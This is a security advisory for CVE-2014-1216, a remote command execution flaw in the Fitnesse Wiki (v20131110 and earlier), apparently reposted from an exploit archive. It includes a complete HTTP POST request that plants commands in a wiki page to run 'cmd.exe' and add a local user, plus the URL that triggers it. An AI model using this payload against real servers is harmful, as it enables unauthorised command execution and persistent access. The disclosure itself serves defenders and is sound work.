Fitnesse Wiki 20131110 suffers from a remote command execution vulnerability.
Vulnerability title: Remote Command Execution in Fitnesse Wiki
CVE: CVE-2014-1216
Vendor: Fitnesse
Product: Wiki
Affected version: v20131110 and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:
The Fitnesse wiki does not validate the syntax of edited pages to
validate whether the pages are introducing any extra parameters that
could be executed in the context of the application. This vulnerability
could be exploited by remote attackers to introduce external commands
into the workflow of the application that would execute them.
Exploit
After creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:
POST /<any page> HTTP/1.1
Host: <host>:<port>
Proxy-Connection: keep-alive
Content-Length: 374
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<host>:<port>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://<host>:<port>/<page>?edit
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: textwrapon=false; wysiwyg=textarea
editTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save
After editing the page with content specified above, the vulnerability could be triggered by visiting βhttp://<host>:<port>/<created/edited page name>?testβ
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/
# 0day.today [2018-01-08] #